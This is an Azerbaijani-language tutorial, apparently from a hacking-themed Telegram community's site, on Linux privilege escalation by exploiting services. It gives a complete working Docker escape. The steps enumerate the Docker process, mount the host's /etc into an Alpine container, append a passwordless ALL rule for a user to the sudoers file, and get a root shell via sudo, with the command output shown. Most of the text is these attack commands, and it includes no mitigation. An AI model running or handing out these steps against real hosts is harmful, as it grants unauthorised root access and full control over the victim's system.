Linux Privilege Escalation nədir? Hansı təhlükəsizlik boşluqları var? Privilege Escalationda hansı məqamlara əsas fikir verilməlidir? servis nədir? service exploit nədir? exploit faylı nədir? servis istismarı nədir? servis exploit edilməsi ilə Privilege Escalation
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Servislərin Exploit Edilməsi
Linux əməliyyat sistemində işlənən servislərin öz əməliyyatlarını yerinə yetirmək üçün root səlahiyyətlərində fəaliyyət göstərir.Bu çatışmazlıq bizə hədəf sistemin servislərin exploit edilməsi sayəsində root shell əldə etməyimizə yol açır.Deamon kimi işləyən servislərin ən yaxşısı elə Docker-dir (Digər nümunələr üçün Apache, MySQL və s).İcra olunan prosesləri enumeration edərək Docker tapaq.
ps -aux | grep Docker
Dockerdən istifadə edərək əvvəl Sudoers faylının exploit edilməsi əməliyyatını yerinə yetirəcəyik.Daha sonra Alpine obrazı altında yeni konteyner yaradırıq.
docker run -itd -v /etc/:/mnt/ alpine
docker ps
Diqqət yetirilməli məqam burada odurki, biz Ubuntu maşınındaki /etc/ qovluğunu Docker konteynerinin /mnt/ eyniləşdirdik.İndi isə konteynerdən istifadə edərək sudoers faylının redaktəsini yerinə yetirək.
docker exec -it (id) /bin/sh
/ cd /mnt/
/mnt # echo "elliot ALL=(ALL) NOPASSWD: ALL" >> sudoers
|mnt # exit
Əməliyyatları yerinə yetirdikdən sonra baxaq görək biz sudo əmrindən istifadə edərək hədəf Ubuntu sistemində root ola bilirikmi?
elliot@Ubuntu:~$ sudo sh -i
# whoami
root
#
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat